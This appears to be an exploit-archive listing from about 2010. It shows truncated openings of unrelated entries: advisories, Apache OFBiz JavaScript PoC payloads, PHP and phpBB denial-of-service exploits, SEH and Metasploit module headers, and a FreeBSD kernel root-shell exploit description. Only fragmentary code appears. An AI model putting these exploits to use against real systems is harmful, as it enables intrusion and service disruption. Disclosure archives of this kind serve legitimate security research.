----------------------------- Advisory ----------------------------- Unauthenticated File-system Access in iomega Home Media Network Hard Drive ----------------------------- Affected products ----------------------------- iomega Home Media Network H
/* Apache OFBiz FULLADMIN Creator PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa ( lucas -at- bonsai-sec.com ). Bonsai Information Security http://www.bonsai-sec.com/ */ var username = 'bonsaiUser'; var password = 'bonsaiPass'; var nodes = document.g
/* Apache OFBiz SQL Remote Execution PoC Payload. CVE: CVE-2010-0432 By: Lucas Apa ( lucas -at- bonsai-sec.com ). Bonsai Information Security http://www.bonsai-sec.com/ */ var cmd = 'command'; var xmlhttp=false; try { xmlhttp = new ActiveXObject(Msx
//#DOS Php 5.3.x //########################################################################### //#Title: Dos Php 5.3.0 //#Vendor: http://php.net //#Tested On Php 5.3.0 On Windows xp Sp3 And Redhat //###################################################
#!/usr/bin/ruby # Software : Archive Searcher 2.1 # Author : Lincoln # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Greetz to : Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ #
# Title: Winamp 5.572 whatsnew.txt SEH (MSF) # Author: Blake # Published: 2010-04-15 # Tested on Windows XP SP3 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Met
#if 0 FreeBSD 6.4 and below are vulnerable to race condition between pipeclose() and knlist_cleardel() resulting in NULL pointer dereference. The following code exploits vulnerability to run code in kernel mode, giving root shell and escaping from j
================================================= Oracle Financials R12 SQL injection vulnerability ================================================= Yesterday a friend of mine told me that I forget to share with the general public one small detail a
============================================================== phpBB modified by Przemo = 1.12.6p3 Denial Of Service Exploit ============================================================== ?php #########################################################
# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.htmlimport sys,SocketServer,socket,threading,time,randomfrom random import *from time import sleepfrom socket import * if len(sys.argv)=2: sys.exit('Usage: pwn.
[DSECRG-09-049] IBM BladeCenter Management Module - DoS vulnerability Source: http://www.dsecrg.com/pages/vul/show.php?id=149 This device can be remotely rebooted by sending a malformed TCP packets Digital Security Research Group [DSecRG] Advisory #
### $Id: ms07_017_ani_loadimage_chunksize.rb 9085 2010-04-15 16:08:27Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for mo
### $Id: java_ws_arginject_altvm.rb 9083 2010-04-15 15:23:43Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more inform